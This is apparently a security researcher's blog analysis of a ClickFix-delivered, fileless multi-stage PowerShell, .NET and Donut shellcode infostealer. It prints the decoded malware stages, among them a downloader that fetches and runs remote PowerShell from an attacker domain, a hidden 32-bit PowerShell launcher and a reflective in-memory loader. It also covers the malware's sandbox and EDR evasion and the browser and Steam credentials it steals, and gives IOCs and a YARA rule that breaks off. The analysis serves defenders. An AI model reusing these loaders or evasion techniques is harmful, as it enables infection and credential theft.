0xB14CKY

PowerShell to Shellcode: Reversing a Fileless Multi-Stage Malware Chain May 2026

Fri, 08 May 2026 00:00:00 GMT

Multi-Stage PowerShell Loader & Donut Shellcode Analysis

Author: Jeel Nariya
Published: 2026-05-08

Overview

This malware uses multiple PowerShell stages, XOR/Base64 obfuscation, and Donut shellcode to execute payloads completely in memory while avoiding static detection.

Infection Chain

Stage Analysis

Stage0 — Initial Payload

URL

https[:]//6fd64f52[.]syscheck-loadverifyov3[.]pages[.]dev/?v=moa4x7jh&s=1&r=68h7

After opening this site it will automatically paste some Powershell malicious code into clipboard, this is classic social engineering technique named ClickFix.

Behavior

This is something useful code and it looks malicious because it doing XOR decryption with a key,
Here is the cleaned code,

$key = "xwT2sd46cGELLKZs4fEU"
$data = [Convert]::FromBase64String("clMRQAELRncAMywjIhsoFlIDNzAWFDESTkQTZQorICI4JyMwWwgxPBYCMRV5QHdfFxEmfQI9CCRnFmVoWFU8RgcURwxMaCQ5OCM/C10IIjkXFjAcABRVVQZoJyI1PnQBFmwxJwFXLzhTRBQWRzQmPiU7LlMJRm0bHQB5fREOUVUXZwspOGUNFlYlKTwdGSAbXSBbQQ0rKi0oGC4BXQgifVw0PUYlBwV4FRUSHzxiUFMURmU8HQ90FgAHRl8TM08xbCg7B1cOZS4FfQ==")

$decoded = for ($i=0; $i -lt $data.Length; $i++) {
    $data[$i] -bxor [byte][char]$key[$i % $key.Length]
}

$script = -join ([char[]]$decoded)
Invoke-Expression $script

After decryption of this strings statically in cyberchef, it looks like this,

$ErrorActionPreference = 'SilentlyContinue'
$CitVc1NvRWSp = "https://authexingload.space/bnyu.r"
try {
    $script = (New-Object Net.WebClient).DownloadString($CitVc1NvRWSp)
    iex $script
} catch {}

Invoke-Expression $script

Notes

This stage0 try to decrypt some base64 and execute it, and it spits out the stage1 Powershell.

Stage1 — PowerShell Loader

Behavior

This script will download another stage from given URL,

https[:]//authexingload[.]space/bnyu[.]r

Stage2 — PowerShell Loader

Behavior

This is another powershell stager which has large base64 blog,

$ErrorActionPreference = 'SilentlyContinue'
$pay = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAkAEUAcgByAG8Acg.............pACkAIAB9AAoAfQAKAA=='))
if ([IntPtr]::Size -eq 8) {
    $p86 = "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    if (Test-Path $p86) {
        $si = New-Object System.Diagnostics.ProcessStartInfo
        $si.FileName = $p86
        $si.Arguments = "-NoProfile -WindowStyle Hidden -Command -"
        $si.UseShellExecute = $false
        $si.CreateNoWindow = $true
        $si.RedirectStandardInput = $true
        $proc = [System.Diagnostics.Process]::Start($si)
        $proc.StandardInput.WriteLine($pay)
        $proc.StandardInput.Close()
        exit
    }
}
IEX $pay

Notes

Technique	Purpose
Base64 encoding	Obfuscation
Hidden PowerShell	Stealth
`IEX`	Fileless execution
32-bit PowerShell	Bypass defenses / compatibility
STDIN execution	Avoid command-line logging
NoProfile	Cleaner environment

Stage3 — Downloader

Behavior

Now after decoding the base64 blob it spits out something like this,

$ErrorActionPreference = 'SilentlyContinue'
Add-Type -AssemblyName System.Windows.Forms
$d = [Convert]::FromBase64String('QUD5izFgfnE3l9LtS...eLxX1piy68BgqtqGVtN')
$k = [Convert]::FromBase64String('DBppizJgfnEzl9LttCPeWFxuBA33gBKuY4Hkq2oZW00=')
$p = New-Object byte[] $d.Length
for ($i=0;$i -lt $d.Length;$i++) { $p[$i] = $d[$i] -bxor $k[$i % $k.Length] }
$a = [Reflection.Assembly]::Load($p)
$m = $a.EntryPoint
if ($m) {
    [Windows.Forms.Application]::EnableVisualStyles()
    $pa = $m.GetParameters()
    if ($pa.Length -eq 0) { $m.Invoke($null, $null) }
    else { $m.Invoke($null, @(,[string[]]@())) }
}

Notes

Technique	Purpose
Base64	Obfuscation
XOR encryption	Hide payload
Reflection.Assembly.Load	Fileless execution
In-memory PE loading	Evasion
EntryPoint invocation	Execute payload
No disk artifact	Avoid AV scanning

Stage4 - .NET Loader

Behavior

Now after XOE decrypting the base64 blob with given key, it gives one executable binary,

This is .Net Compiled 32 bit Binary.

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[/]
└─$ file stage4.exe

stage4.exe.defused: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections

Initial static analysis

I will perform some initial static analysis to get some context before diving into dnspy,
First and foremost thing is typical virustotal,
- I found almost 48 matches so this is not something new,
- Although previous stagers have no signatures on it.

I will start with pestudio,

It is showing some details which are,
- Compile time → Tue Apr 21 00:27:49 2026 (UTC)
- File Size, Version, description etc..

Import details,

This is output of detect it easy specifying that it is,

PE32 → 32-bit Windows executable
I386 → x86 architecture
GUI → no console window, graphical app type
MSIL/C# → .NET executable written in C#
.NET CLR v4.0.30319 → requires .NET Framework 4.x runtime
Microsoft Linker 11.0 → likely compiled using Visual Studio 2012 toolchain
Little Endian (LE) → standard x86 byte order
Authenticode / PKCS#7 → contains digital signature structure/certificate blob
Overlay present → extra data appended after PE end
Overlay Size 0x1d00 → ~7 KB extra data appended
Common malware indicators:
- reflective .NET loading compatible
- hidden GUI execution
- possible packed/obfuscated payload
- possible hidden config/payload in overlay
This is the entropy information,

There is some data in overlay which looks random,
- it might be shellcode, packed data etc..

Code Analysis

Now i will open this stag4 sample into dnspy,
It has these many function including some junk code,
We will start with main,

This is the Main code which is a Shellcode Loader,
- Behavior:
  1. decrypt embedded shellcode
  2. allocate executable memory
  3. inject shellcode into memory
  4. execute via native thread
  5. optionally perform decoy GUI actions

It is also doing some Masquerading things like processing junk code to confuse the analyst,

It is a large byte array containing AES encrypted Shellcode,

Behavior	Why Suspicious
Shellcode decryption	Hidden payload
RWX memory allocation	Code injection
NtAllocateVirtualMemory	Native API abuse
NtCreateThreadEx	Shellcode execution
Marshal.Copy to executable memory	Injection pattern
Hidden GUI	Stealth
Empty catch blocks	Hide failures
Fake Microsoft naming	Masquerading

DecryptShellcode Function analysis,
This function:
1. Takes encrypted shellcode
2. Decodes AES key + IV
3. AES-decrypts payload in memory
4. Returns executable shellcode bytes

Dynamic Analysis to get Extract Shellcode

So to carve the shellcode, i put breakpoint right after decryption and it is written in array buffer so i carve it into a file called stage5_shellcode.bin,

Notes

This is summarized working flow,

Stage5 - Donut Shellcode

Doing some simple analysis to get some information and found that it is Donut shellcode,
- https://github.com/thewover/donut

Since it is open source so we see the main capabilities it have,
- Executes payloads completely from memory (fileless execution)
- Supports EXE, DLL, .NET assemblies, VBScript, and JScript
- Uses dynamic API resolution and API hashing
- Walks the PEB to find loaded DLLs instead of normal imports
- Can encrypt/compress embedded payloads
- Supports AMSI/WLDP bypass techniques
- Hosts the .NET CLR in memory for reflective .NET execution
- Works well for process injection and reflective loading

Shellcode Analysis

Now after knowing that this is know in public so maybe there will some decrypted available which can be useful,
This is very useful in that process,
- https://github.com/volexity/donut-decryptor
Installation commands,

cd /path/to/donut-decryptor
python -m pip install .

After installation we can decrypt the shellcode,

donut-decryptor --outdir shellcode_dec/ --debug stage5_shellcode.bin

We get this 2 files,

└─$ file *

inst_stage5_shellcode.bin: JSON text data
mod_stage5_shellcode.bin:  PE32 executable for MS Windows 6.00 (GUI), Intel i386, 5 sections

Here is json file content,
It shows the configuration of shellcode
- A Donut-generated shellcode loader that contains an embedded DLL payload directly inside it, using normal Donut obfuscation but no compression.

{
  "File": "stage5_shellcode.bin",
  "Instance Type": "DONUT_INSTANCE_EMBED",
  "Entropy Type": "DONUT_ENTROPY_DEFAULT",
  "Decoy Module": "",
  "Module Type": "DONUT_MODULE_DLL",
  "Compression Type": "DONUT_COMPRESS_NONE"
}

But it decrypts the ASMx86 Compiled file,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ diec stage6_carvedfromshellcode.bin -u --verbose

[HEUR/About] Generic Heuristic Analysis by DosX (@DosX_dev)
[HEUR] Scanning has begun!
[HEUR] Scanning to programming language has started!
[HEUR] Scan completed.
PE32
    Operation system: Windows(Vista)[I386, 32-bit, GUI]
    Linker: Microsoft Linker(14.36.35728)
    Compiler: MASM(14.36.35728)
    Language: ASMx86

Stage6 - ASMx86 Analysis

Initial Static Analysis

Detect it Easy Shows high entropy in 2 sections for packed,
- .text and .reloc

Some static analysis using PEStudio again,
- Compile Date: Tue Jul 16 11:09:57 2024 (UTC)

It contains the rich header means it is build using Visual Studio,

Some malicious APIs and its actions,

Initial Dynamic Analysis

I have used these 3 pair of tools,
- ProcMon: For Monitoring the Process
- RegShot: See the Diff or Registery
- Fakenet: To see network communication
- Process Hacker: Process Information
After executing malware as admin it immediately exist because as we make assumption that it is doing process injection so that's,

After executing the sample, i found that this is trying to communicate with server,

192[.]0[.]2[.]123

Now you might think it has Anti-VM artifacts so why does it is executed so you will found that answer next section,
It creates bunch of DLLs in same directory and removed it later,

So now lets see the network logs in Wireshark,
As mentioned, it is using encrypted traffic because it exfiltrate data on HTTPS.

But in the fakenet tab it is visible that where does request does,

https[:]//tq[.]trxzidan[.]icu
https[:]//telegra[.]ph/Parameter-04-03

Code Analysis

This is the whole working flow of this sample,
Let me walk thought each one by one,
Start with start or entrypoint of the function,

Anti-Analysis Checks

Environment Checks

Here is Description of this API,
- GetVersionExA function (sysinfoapi.h)

Anti-Debug Check

It is checking the PEB(Process Environment Block) which contains the BeingDebugged Flag at offset 0x02,
Second one is NtGlobalFlag at offset 0x68 which is by default 0 but if debugger attacked then it is non zero.
More on this, https://anti-debug.checkpoint.com/techniques/debug-flags.html#using-win32-api-ntqueryinformationprocess-processdebugflags
Understanding The PEB for Reverse Engineers (OALabs 💖): https://www.youtube.com/watch?v=uyisPPTupmA
Digging into Windows PEB: https://mohamed-fakroud.gitbook.io/red-teamings-dojo/windows-internals/peb
Diving Into PEB Walk: https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

Now if PEB walk is there so certainly there will be API resolution so we will explore it,

Another Anti-Debug technique is WOW64 Transition,
It’s an indirect call into WOW64’s internal dispatcher
It’s a WOW64 internal dispatcher stub that XOR-decodes a function pointer and calls a hidden system transition routine via FS:[0xC0], commonly used for indirect execution and evasion in malware loaders.
And i checked at runtime in debugger and found that after this function call it raise some exception and program exits.

Anti-EDR Check

This is a Anti-EDR technique in which it is checking where these 2 drivers exits or not, if exit then it will exit,
C:\\Windows\\System32\\drivers\\klhk.sys
C:\\Windows\\System32\\drivers\\klif.sys

Anti-VM / Sandbox Check

Anubis / Agent-based sandbox
Common sandbox agent naming (ANY.RUN + generic analysis agents)

"agent.exe"  
"arunagent"

ANY.RUN sandbox
Online interactive malware analysis sandbox

QEMU virtual machine
QEMU Guest Agent (very strong VM indicator)

"qemu-ga.exe"

VirtualBox
VirtualBox user-mode tray process

"vboxtray"

So the full detection list is:
Sandboxes / Analysis environments
- ANY.RUN sandbox (anyrun)
- Analysis agent (agent.exe)
- Runtime sandbox agent (arunagent)
Virtualization platforms
- QEMU VM (qemu-ga.exe)
- VirtualBox (vboxtray)

Runtime API Resolution

So now the upper value which is being pushed to stack, 0xFCB67412
is our hash so i tried the hashdb to resolve it but i failed so made my own script using Claude to resolve it,
This is the working diagram of hashing algorithm,

Here is my script,
It will first parse all the important DLLs and its APIs and make a hash table of it, then we can simply match the target hash and get the API,
It will load the hashes.txt file which has all hashes,

#!/usr/bin/env python3

# ============================================================
# Malware API Hash Resolver
# ============================================================
#
# Usage:
#   python3 resolve_hashes.py hashes.txt
#
# hashes.txt:
#   0xFCB67412
#   0x12345678
#
# Environment:
#   WSL + Windows DLLs from:
#       /mnt/c/Windows/System32
#
# ============================================================

import os
import sys
import pefile

SYSTEM32 = "/mnt/c/Windows/System32"

# ------------------------------------------------------------
# DLLs to parse
# ------------------------------------------------------------

COMMON_DLLS = [
    "kernel32.dll",
    "kernelbase.dll",
    "ntdll.dll",
    "advapi32.dll",
    "user32.dll",
    "gdi32.dll",
    "ws2_32.dll",
    "wininet.dll",
    "urlmon.dll",
    "shell32.dll",
    "ole32.dll",
    "combase.dll",
    "crypt32.dll",
    "iphlpapi.dll",
    "shlwapi.dll",
    "psapi.dll",
    "sechost.dll",
    "bcrypt.dll",
    "rpcrt4.dll",
    "winhttp.dll",
    "setupapi.dll",
    "netapi32.dll",
    "dnsapi.dll",
    "wtsapi32.dll",
    "oleaut32.dll",
    "userenv.dll",
    "dbghelp.dll",
    "comdlg32.dll",
    "uxtheme.dll",
]
# ------------------------------------------------------------
# ROTL32
# ------------------------------------------------------------

def rol32(value, bits):

    bits &= 31

    if bits == 0:
        return value & 0xFFFFFFFF

    return ((value << bits) | (value >> (32 - bits))) & 0xFFFFFFFF


# ------------------------------------------------------------
# Malware hash algorithm
# ------------------------------------------------------------

def mw_hash(s):

    s = s.encode(errors="ignore")

    length = len(s)

    if length:

        edx = 0x75A887A5

        for i, c in enumerate(s):

            # lowercase conversion
            if 0x41 <= c <= 0x5A:
                c += 0x20

            ebx = ((c << 16) | c) & 0xFFFFFFFF

            eax = rol32(0x86679E7F, i)
            eax ^= ebx

            eax = (eax * 0xCEDEB46B) & 0xFFFFFFFF
            eax = rol32(eax, 8)

            eax = (eax * 0x9228D003) & 0xFFFFFFFF

            eax ^= edx

            eax = rol32(eax, 16)

            eax = (eax * 0xC10609A7) & 0xFFFFFFFF

            eax = (eax + 0x86679E7F) & 0xFFFFFFFF

            edx = eax ^ (eax >> 15)

    else:
        edx = 0x75A887A5

    edx ^= length

    eax = edx ^ (edx >> 16)
    eax = (eax * 0xC0A4F1EB) & 0xFFFFFFFF

    ecx = eax ^ (eax >> 13)

    eax = (ecx * 0x8DAA4A67) & 0xFFFFFFFF

    ecx = eax ^ (eax >> 16)

    ecx = (ecx * 0xCEDEB46B) & 0xFFFFFFFF

    eax = ecx ^ (ecx >> 15)

    return eax & 0xFFFFFFFF


# ------------------------------------------------------------
# Build export database
# ------------------------------------------------------------

def build_db():

    db = {}

    print("[*] Parsing DLL exports...\n")

    for dll in COMMON_DLLS:

        dll_path = os.path.join(SYSTEM32, dll)

        if not os.path.exists(dll_path):
            print(f"[-] Missing: {dll}")
            continue

        print(f"[+] {dll}")

        try:

            pe = pefile.PE(dll_path)

            if not hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                continue

            for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:

                if not exp.name:
                    continue

                try:
                    api = exp.name.decode(errors="ignore")
                except:
                    continue

                h = mw_hash(api)

                if h not in db:
                    db[h] = []

                db[h].append(f"{dll}!{api}")

        except Exception as e:

            print(f"    ERROR: {e}")

    return db


# ------------------------------------------------------------
# Load hashes from file
# ------------------------------------------------------------

def load_hashes(path):

    hashes = []

    with open(path, "r") as f:

        for line in f:

            line = line.strip()

            if not line:
                continue

            try:
                hashes.append(int(line, 16))

            except:
                print(f"[-] Invalid hash: {line}")

    return hashes


# ------------------------------------------------------------
# Main
# ------------------------------------------------------------

def main():

    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} hashes.txt")
        return

    hashes_file = sys.argv[1]

    hashes = load_hashes(hashes_file)

    print(f"[+] Loaded {len(hashes)} hashes\n")

    db = build_db()

    print("\n================ RESULTS ================\n")

    found = 0

    for h in hashes:

        print(f"0x{h:08X}")

        if h in db:

            found += 1

            for api in db[h]:
                print(f"    -> {api}")

        else:
            print("    -> NOT FOUND")

        print()

    print("=========================================")
    print(f"[+] Resolved: {found}/{len(hashes)}")
    print("=========================================")


if __name__ == "__main__":
    main()

But first we need to get all the hashes so for that i used IDAPython scripting to get all the hashes with simple logic, which is that copy the upper 3rd argument of call mw_api_resolver and it should be push <hex value>,
Here is script which will pull all the hashed which are fits in this pattern,

import idautils, idaapi, idc, os

TARGET  = "mw_api_resolver"
OUTFILE = os.path.join(os.path.dirname(idaapi.get_input_file_path()), "hashes.txt")

def is_push_imm(ea):
    return idc.print_insn_mnem(ea).lower() == "push" and \
           idc.get_operand_type(ea, 0) == idaapi.o_imm

def find_hash(call_ea):
    ea, pushes = idc.prev_head(call_ea), 0
    for _ in range(12):
        if ea == idc.BADADDR: break
        if idc.print_insn_mnem(ea).lower() == "push":
            pushes += 1
            if pushes == 2:
                return (idc.get_operand_value(ea, 0) & 0xFFFFFFFF) if is_push_imm(ea) else None
        ea = idc.prev_head(ea)
    return None

target_ea = idc.get_name_ea_simple(TARGET)
if target_ea == idc.BADADDR:
    print(f"[-] '{TARGET}' not found — check label name")
else:
    hits, misses = [], []
    for xref in idautils.CodeRefsTo(target_ea, False):
        h = find_hash(xref)
        (hits if h else misses).append((xref, h))

    print(f"\n{'─'*45}")
    for ea, h in hits:
        print(f"  0x{ea:08X}  →  0x{h:08X}")
    print(f"{'─'*45}")
    print(f"  Resolved : {len(hits)}   |   Skipped : {len(misses)}")
    print(f"{'─'*45}\n")

    if hits:
        with open(OUTFILE, "w") as f:
            f.writelines(f"0x{h:08X}\n" for _, h in hits)
        print(f"[+] Saved → {OUTFILE}")

After some cleaning, It extracted almost 94/114 APIs which is not that good, i know but this is more simpler way to do this,

Anti-Debug / Anti-Sandbox / Sleep Logic

API	DLL	Why malware uses it	Malicious purpose
`GetTickCount`	kernel32 / kernelbase	Retrieves system uptime in ms	Used for timing checks, delays, and anti-debug (detect stepping / sandbox acceleration)
`IsWindowVisible`	user32.dll	Checks window visibility state	Detects user interaction vs hidden execution (sandbox UI artifacts)

Process Injection / Execution Control

As i said in PEStudio Stage that it has process injection and it is proved here,

API	DLL	Why malware uses it	Malicious purpose
`CreateProcessA/W`	kernel32/kernelbase	Creates new processes	Used for payload execution, LOLBins chaining, or injection target creation
`NtSetInformationThread`	ntdll	Modifies thread behavior	Used for hiding threads (ThreadHideFromDebugger)
`NtQueryInformationProcess`	ntdll	Retrieves process metadata	Used for debugger detection / process enumeration stealth checks
`NtQueueApcThread`	ntdll	Queues async procedure call	Classic APC injection technique
`RtlCreateUserThread`	ntdll	Creates remote thread	Used in process injection / reflective loaders
`InitializeProcThreadAttributeList`	kernel32	Thread attribute setup	Used for PPID spoofing / stealth process creation
`UpdateProcThreadAttribute`	kernel32	Modifies attributes	Used for parent process spoofing / injection stealth

DLL Loading / Dynamic Resolution

API	DLL	Why malware uses it	Malicious purpose
`LdrLoadDll`	ntdll	Low-level DLL loader	Used for manual module loading, hiding imports

Crypto / Credential Access

API	DLL	Why malware uses it	Malicious purpose
`CryptUnprotectData`	crypt32.dll	DPAPI decryption	Used to steal saved browser passwords / cookies / credentials

System Information / Fingerprinting

API	DLL	Why malware uses it	Malicious purpose
`GetSystemMetrics`	user32.dll	System UI properties	Detects VM/sandbox display configs
`EnumDisplayDevicesA`	user32.dll	Display enumeration	VM detection (virtual GPU / fake monitor detection)
`GetSystemWow64DirectoryA`	kernel32	Checks OS architecture	Detects 32/64-bit environment
`GetVolumeInformationW`	kernel32	Disk serial / FS info	Used for machine fingerprinting
`GetAdaptersAddresses`	iphlpapi.dll	Network adapter info	Used for network fingerprinting / sandbox detection
`LCIDToLocaleName`	kernel32	Locale detection	Used for geolocation / VM region detection

Memory Management / Obfuscation Support

API	DLL	Why malware uses it	Malicious purpose
`GlobalAlloc / GlobalFree`	kernel32	Heap allocation	Used in payload staging / unpacking
`GlobalLock / Unlock`	kernel32	Memory locking	Used for staged shellcode handling
`GlobalSize`	kernel32	Memory size check	Used in buffer manipulation
`LocalFree`	kernel32	Memory cleanup	Used in anti-analysis cleanup
`WriteFile`	kernel32	File I/O	Used for dropping payloads or pipes
`CreatePipe`	kernel32	Anonymous pipes	Used for process chaining / C2 staging
`SetHandleInformation`	kernel32	Handle control	Used for anti-inheritance / stealth IPC

Screen / Keylogging / Surveillance

API	DLL	Why malware uses it	Malicious purpose
`GetDC`	user32	Device context capture	Used for screen capture
`ReleaseDC`	user32	Release DC	cleanup for capture routines
`BitBlt`	gdi32	Screen copy	Classic screen scraping / spyware capture
`GetDIBits`	gdi32	Extract bitmap pixels	Used for image extraction
`CreateCompatibleDC`	gdi32	Offscreen drawing	Used in screenshot pipelines
`CreateCompatibleBitmap`	gdi32	Bitmap buffer	Screen capture buffer creation
`SelectObject`	gdi32	GDI object selection	Used in image manipulation
`DeleteDC / DeleteObject`	gdi32	Cleanup	Anti-analysis cleanup
`GdiFlush`	gdi32	Flush GDI calls	Ensures capture completion
`GetDesktopWindow`	user32	Desktop handle	Base for full screen capture

Registry / Persistence / System Query

API	DLL	Why malware uses it	Malicious purpose
`RegOpenKeyExA`	advapi32	Open registry key	Used for persistence / startup keys
`RegQueryValueExA`	advapi32	Read registry values	Used for system reconnaissance
`RegCloseKey`	advapi32	Close registry handle	cleanup

Networking / C2 Communication

API	DLL	Why malware uses it	Malicious purpose
`WSAStartup`	ws2_32	Init sockets	Initializes network stack
`WSACleanup`	ws2_32	Cleanup sockets	network teardown
`getaddrinfo`	ws2_32	DNS resolution	C2 domain resolution
`freeaddrinfo`	ws2_32	Free DNS results	memory cleanup

COM / GUID / System Identity

API	DLL	Why malware uses it	Malicious purpose
`CoInitializeEx`	ole32/combase	Init COM	Required for advanced Windows APIs
`CoUninitialize`	ole32/combase	Cleanup COM	teardown
`CoCreateInstance`	ole32/combase	Create COM objects	Used for system interaction stealth
`CoCreateGuid`	ole32/combase	Generate GUID	Used for unique bot IDs / persistence IDs

Config Bootstrap

It is staging a powershell command to download next stage payload from there,
but currently it is down,

https[:]//telegra[.]ph/Parameters-04-03

C2 Communication

At runtime i found that this function will resolve, getadressinfo and resolve domain name to ip address,

This is the function where whole HTTP header will build and request made to C2,

Now at runtime i found the actual C2 domain,

tq[.]trxzidanp[.]icu

It also doing some low-level network activity designed to bypass traditional security monitoring.

The AfdOpenPacket family of functions interacts directly with the Ancillary Function Driver (AFD.sys), which is the kernel-mode driver responsible for Windows Sockets (Winsock) and TCP/IP traffic.
Direct TCP Socket Creation: Advanced malware can use AfdOpenPacket (often accessed via NtCreateFile on \\Device\\Afd) to craft raw TCP sockets without relying on standard Windows APIs like ws2_32.dll.
Bypassing Security Monitoring: By interacting directly with AFD.sys in the kernel, malware can evade security solutions that hook higher-level Winsock APIs, allowing it to send or receive data silently.

Browser and Other Data Theft

Now for these module i found so many functionalities so listed some important only,

Browser Credential

This is structure of function, it is making json object as shown and exfiltrate it.

{
   "n": "Chrome",
   "p": "Google\\Chrome\\User Data",
   "pn": "Default",
   "t": 1
 }
// Extracting Data From 
"C:\\Users\\<USER>\\AppData\\Local\\Google\\Chrome\\User Data"
// such as 
"\\Local State, encrypted_key, profiles_order"

Browser Cookies

It doing these for both, Firefox and Chrome,

Stealing Firefox Profiles and Extension Information

Stealing Steam Cache Data

You see many “key-like” strings being constructed:
- "users"
- "AccountName"
- "Software"
- "Valve"
- "Steam"
- "Connect"
- "Cache"
System + user environment harvesting: (HKCU\Software\Valve\Steam)
- user accounts
- installed software
- Steam / Valve gaming data
- registry keys under Software hive
- cache / session data
It stills files such as,
- Steam\config\loginusers.vdf
- Steam\config\config.vdf
- Steam\config\steamappdata.vdf
- Steam\config\steamapps.vdf
- Steam\config\ssfn*
- Steam\config\htmlcache\
- Steam\userdata\ etc.

Data Exfiltration

it is doing json escaping to transport all the stolen json data to C2,

Threat Intelligence

AnyRun Report : https://any.run/report/9d0ce7a84e62e3458b82d682c7c3f97d095cb2fba8caa0263ee8929994990254/311c6448-7c0a-461b-83ea-e13360d1383f

Hybrid Analysis Report: https://hybrid-analysis.com/sample/9d0ce7a84e62e3458b82d682c7c3f97d095cb2fba8caa0263ee8929994990254/69e8bf822283d37f6b027207

VirusTotal Give 4 hits for domain,
- https://www.virustotal.com/gui/domain/tq.trxzidan.icu

For Shellcode it gives 20 hits,
- https://www.virustotal.com/gui/file/7e3e622c9762b8ccdf813c0b288f677f1b4055e31389440a9b692638555a5153

For .NET Sample it gives 48 hits,
- https://www.virustotal.com/gui/file/c1e8ea0ebbe41a5714caca4fc85046de84dd82553379c16b7f83b0c7fc8ce20a

VT Graph and Collection
- https://www.virustotal.com/gui/collection/cceb0d0facbb996502cdc4c4ff055432ceda7d898a7ad3ef2a8d14905edff5b6/summary

IOCs

URLs

https[:]//6fd64f52[.]syscheck-loadverifyov3[.]pages[.]dev/
https[:]//authexingload[.]space/bnyu[.]r
https[:]//telegra[.]ph/Parameter-04-03
https[:]//tq[.]trxzidan[.]icu
https[:]//192[.]0[.]2[.]123

Payloads

Stages	Type	Hash
stage0.ps1	Pwsh	2e2490b755819d71092a71961d4bfaff5cf3f69fd00199e38759370806d7f78b
stage1.ps1	Pwsh	986c84f6345e6b40f5ece22c961a7fdb9356733c2ca0b8a22970c7c18ee1ed4e
stage2.ps1	Pwsh	9d0ce7a84e62e3458b82d682c7c3f97d095cb2fba8caa0263ee8929994990254
stage3.ps1	Pwsh	beef326622ceb85d37697b965c55290f04c0c6088016b45ba9e17026e36d1fe3
stage4.exe	.NET	c1e8ea0ebbe41a5714caca4fc85046de84dd82553379c16b7f83b0c7fc8ce20a
stage5_shellcode.bin	Shellcode	7e3e622c9762b8ccdf813c0b288f677f1b4055e31389440a9b692638555a5153
stage6_carvedfromshellcode.exe	ASMx86	25d0ad1cc25b94cb4e01ece63b9de726212ed4172f284b12946c5c5b6c732f90

MITRE ATT&CK Mapping

Tactic	Technique ID	Technique Name	Where in your chain	Evidence (from reports + behavior)
Initial Access	T1566.002	Phishing: Spearphishing Link	Stage0	Clipboard clickfix PowerShell URL lure (`pages.dev`)
Execution	T1059.001	PowerShell	Stage0–Stage4	Multi-stage PowerShell loaders across all initial stages
Execution	T1204.001	User Execution: Malicious Link	Stage0	User triggered clipboard execution
Defense Evasion	T1027	Obfuscated/Encrypted Files or Info	Stage1–Stage4	XOR + Base64 + AES-CBC encrypted payloads
Defense Evasion	T1140	Deobfuscate/Decode Files or Information	Stage1–Stage5	Repeated decode → next stage execution chain
Defense Evasion	T1027.002	Software Packing	Stage5	.NET loader with embedded encrypted shellcode
Execution	T1106	Native API Execution	Stage5	.NET runtime executing shellcode manually
Execution	T1620	Reflective Code Loading	Stage5	Runtime shellcode injection in memory
Execution	T1055	Process Injection	Stage5–Stage6	Donut shellcode + in-memory execution
Defense Evasion	T1218.011	Signed Binary Proxy Execution (Rundll32/Regsvr32 style behavior likely)	Stage3–Stage4	PowerShell-based staged execution (LOLBins pattern)
Defense Evasion	T1105	Ingress Tool Transfer	Stage3	Download stage4 payload from external domain
Command & Control	T1071.001	Web Protocols (HTTP/HTTPS)	Stage3–Stage7	C2 + download + exfil over HTTPS endpoints
Command & Control	T1102	Web Service (Telegram-like infra possible)	Stage7	`telegra.ph` used for payload staging
Command & Control	T1568	Dynamic Resolution / Hosting Abuse	Stage0–Stage3	Multiple disposable domains (`pages.dev`, `.space`)
Persistence (possible)	T1053	Scheduled Task/Auto Start Execution	Likely Stage4–5	Common in PowerShell loaders (often seen in HA reports)
Exfiltration	T1041	Exfiltration Over C2 Channel	Stage7	`tq.trxzidanp.icu` exfil endpoint
Collection	T1005	Data from Local System	Stage7	Credential theft / system data harvesting implied
Credential Access	T1555	Credentials from Password Stores	Likely Stage7	Steam credential theft module in earlier analysis
Impact / Payload	T1622	Debugging / Anti-analysis checks	Stage5	Sandbox / VM checks often present in such chains
Execution	T1059.003	Windows Command Shell	Stage3–Stage4	PowerShell often spawns cmd for staging
Defense Evasion	T1497	Virtualization/Sandbox Evasion	Earlier stage malware behavior (you referenced VM checks)

YARA Rule

/*
  YARA rules — PowerShell-to-Shellcode fileless chain (May 2026)
  Source: blog analysis + static parsing of stage0–stage6 samples in this directory.
  Reference: https://github.com/volexity/donut-decryptor (Donut shellcode sigs included)
*/

import "pe"
import "dotnet"
import "hash"

// ---------------------------------------------------------------------------
// Stage 0 — ClickFix clipboard XOR stager → authexingload downloader
// SHA256: 2e2490b755819d71092a71961d4bfaff5cf3f69fd00199e38759370806d7f78b
// ---------------------------------------------------------------------------
rule MAL_PS_ClickFix_Stage0_XOR_Authexingload_May2026
{
    meta:
        author      = "Jeel Nariya / DFIR analysis"
        description = "Stage0 ClickFix PowerShell: rolling XOR key + embedded b64 decrypting authexingload downloader"
        date        = "2026-06-01"
        reference   = "PowerShell to Shellcode: Reversing a Fileless Multi-Stage Malware Chain May 2026"
        stage       = "stage0"
        hash        = "2e2490b755819d71092a71961d4bfaff5cf3f69fd00199e38759370806d7f78b"
        tactic      = "T1566.002"
        technique   = "T1059.001"
        severity    = "high"

    strings:
        $xor_key     = "xwT2sd46cGELLKZs4fEU" ascii
        $b64_blob    = "clMRQAELRncAMywjIhsoFlIDNzAWFDESTkQTZQorICI4JyMwWwgxPBYCMRV5QHdfFxEmfQI9CCRnFmVoWFU8RgcURwxMaCQ5OCM/C10IIjkXFjAcABRVVQZoJyI1PnQBFmwxJwFXLzhTRBQWRzQmPiU7LlMJRm0bHQB5fREOUVUXZwspOGUNFlYlKTwdGSAbXSBbQQ0rKi0oGC4BXQgifVw0PUYlBwV4FRUSHzxiUFMURmU8HQ90FgAHRl8TM08xbCg7B1cOZS4FfQ==" ascii
        $url         = "authexingload.space/bnyu.r" ascii nocase
